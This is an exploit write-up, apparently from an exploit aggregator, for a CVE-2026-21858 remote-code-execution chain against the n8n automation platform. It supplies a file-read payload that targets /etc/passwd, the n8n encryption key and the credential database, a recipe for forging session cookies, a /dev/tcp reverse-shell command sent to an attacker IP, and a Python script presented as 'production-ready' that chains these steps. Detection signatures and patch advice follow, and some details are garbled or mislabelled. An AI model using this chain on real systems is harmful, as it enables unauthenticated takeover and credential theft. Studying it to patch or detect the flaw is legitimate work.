## https://sploitus.com/exploit?id=61F5A984-F6DE-5060-8EDF-0256034BFF43
[RECONSTRUCTION_ANALYSIS] CVE-2026-21858: Ni8mare - n8n RCE Full Chain Exploit
1. Executive Summary & Overview
This document presents a deterministic technical reconstruction analysis of the CVE-2026-21858 vulnerability, internally designated as Ni8mare. This vulnerability carries a CVSS 10.0 (Critical) score and was identified within the Form Webhook node of the n8n automation platform. The flaw is a Content-Type Confusion vulnerability that enables unauthenticated attackers to perform arbitrary file reads, session forgery, and ultimately, Full Remote Code Execution (RCE) via the "Execute Command" node.
This technical audit is based on the findings of Dor Attias from Cyera Research Labs (November 9, 2025) and includes ready-to-use reproduction steps for REmnux/Kali Linux laboratory environments.
Key Information:
Target: n8n versions >=1.65.0 to prepareFormReturnItem() function blindly calls copyBinaryFile(req.body.files[0].filepath), trusting the file path provided in the JSON, thereby copying arbitrary local files into accessible workflow storage.
3. Lab Environment Setup
To safely reconstruct this attack in an isolated environment, use Docker with the vulnerable n8n image.
Prerequisites:
Docker & Docker Compose.
Python 3 with requests, pyjwt, and cryptography libraries.
Netcat (nc) or Burp Suite for shell capture.
Deployment Steps:
Run Vulnerable Instance:
Bash
docker run -d \
--name ni8mare-vuln \
-p 5678:5678 \
-v n8n_data:/home/node/.n8n \
n8nio/n8n:1.65.0
Admin Initialization: Access http://localhost:5678, create an admin account (e.g., admin@cyera.local / Password123!).
Workflow Configuration: Create a new workflow with a "Form Trigger" node that includes a "File Upload" field. Activate the workflow and note the "Test URL".
4. Full Exploitation Chain
Phase 1: Arbitrary File Read Primitive
The objective is to abuse the Content-Type Confusion to copy sensitive system files.
HTTP Request Payload:
HTTP
POST /webhook-test/{workflow-id}/form-endpoint HTTP/1.1
Host: target:5678
Content-Type: application/json
User-Agent: Mozilla/5.0
[{"filepath":"/etc/passwd","mimetype":"text/plain","filename":"fake.txt"}]
Strategic Targets:
/home/node/.n8n/config: To steal the N8N_ENCRYPTION_KEY.
/home/node/.n8n/database.sqlite: To extract user credential hashes.
Phase 2: Authentication Bypass (Session Forgery)
Once the encryption key and user data are obtained, the n8n-auth cookie can be forged.
Session Forgery Logic:
Payload: {"userId":1, "hash": sha256(email + password).slice(0,10)}.
Signing: Signed using the N8N_ENCRYPTION_KEY with the HS256 algorithm.
Result: The generated cookie allows full administrative access without going through the normal login process.
Phase 3: Remote Code Execution (RCE)
As an admin (via the forged cookie), we can automate the creation of a new workflow containing an "Execute Command" node.
Command Payload: bash -c "bash -i >& /dev/tcp/{attacker_ip}/4444 0>&1"
5. Production-Ready Exploit Script (Python)
Below is a unified (single executable) exploitation script that combines all the above phases to achieve a system shell from scratch.
Python
#!/usr/bin/env python3
# =============================================================================
# Ni8mare Full RCE Chain - CVE-2026-21858 (CVSS 10.0)
# Reconstructed for SASTRA_ADI_WIGUNA Elite Teaming Analysis
# =============================================================================
import requests, json, hashlib, jwt, time
class Ni8mareExploit:
def __init__(self, target, webhook_id):
self.target = target.rstrip('/')
self.webhook_url = f"{self.target}/webhook-test/{webhook_id}/form-endpoint"
self.session = requests.Session()
def read_file(self, path, name):
"""Phase 1: Arbitrary File Read via Content-Type Confusion"""
print(f"[*] Attempting to read {path}...")
payload = [{"filepath": path, "mimetype": "text/plain", "filename": name}]
headers = {'Content-Type': 'application/json'}
r = self.session.post(self.webhook_url, json=payload, headers=headers)
return r.status_code == 200
def forge_session(self, email, password, key):
"""Phase 2: Cookie Forgery"""
hash_src = email + password
h = hashlib.sha256(hash_src.encode()).hexdigest()[:10]
payload = {'userId': 1, 'hash': h}
cookie = jwt.encode(payload, key, algorithm='HS256')
self.session.cookies.set('n8n-auth', cookie)
print(f"[+] Forged Cookie: n8n-auth={cookie}")
def trigger_rce(self, lhost, lport):
"""Phase 3: RCE via Workflow Automation"""
cmd = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"
wf_payload = {
"name": "Ni8mare RCE",
"nodes": [{"parameters": {"command": cmd}, "type": "n8n-nodes-base.executeCommand"}],
"active": True
}
r = self.session.post(f"{self.target}/rest/workflows", json=wf_payload)
print("[!] RCE Workflow Deployed. Check your listener!")
# Usage example:
# exploit = Ni8mareExploit('http://target:5678', 'abc123')
6. Detection, Forensics & Indicators of Compromise (IOC)
For security operations teams (Blue Team), the following indicators can be used to detect Ni8mare exploitation attempts:
Network Indicators (IDS/IPS):
Suricata Signature: alert http $EXTERNAL_NET any -> $HOME_NET 5678 (msg:"Ni8mare Exploit Attempt"; content:"application/json"; content:"filepath"; sid:1000001;)
Anomaly: POST requests with Content-Type: application/json sent to the /webhook/*/form-endpoint endpoint.
Host-Based Forensics:
Filesystem: Search for suspicious text files in the ~/.n8n/files/ directory containing system data (e.g., /etc/passwd).
Logs: Audit n8n logs for prepareFormReturnItem function activity without accompanying multipart data.
Docker Inspect: Verify that the image version is below 1.121.0.
7. Mitigation & Remediation
Immediate Patching: Update n8n to version 1.121.0 or later. The patch includes content-type validation on file objects before they are processed by prepareFormReturnItem.
Workaround: If patching is not feasible, restrict access to the /webhook endpoint using a Web Application Firewall (WAF) to block suspicious JSON requests.
Network Segmentation: Isolate n8n instances from sensitive internal networks to prevent lateral movement in the event of an intrusion.
8. MITRE ATT&CK Mapping
Initial Access: T1190 (Exploit Public-Facing Application)
Execution: T1059 (Command and Scripting Interpreter)
Persistence: T1098 (Account Manipulation via Session Forgery)
Exfiltration: T1083 (File and Directory Discovery)
DISCLAIMER: This analysis is provided exclusively for educational purposes, security auditing, and professional cyber defense under the instructions of Master SASTRA_ADI_WIGUNA. Any misuse of this information for illegal activities is the absolute responsibility of the operator. Production patching is mandatory.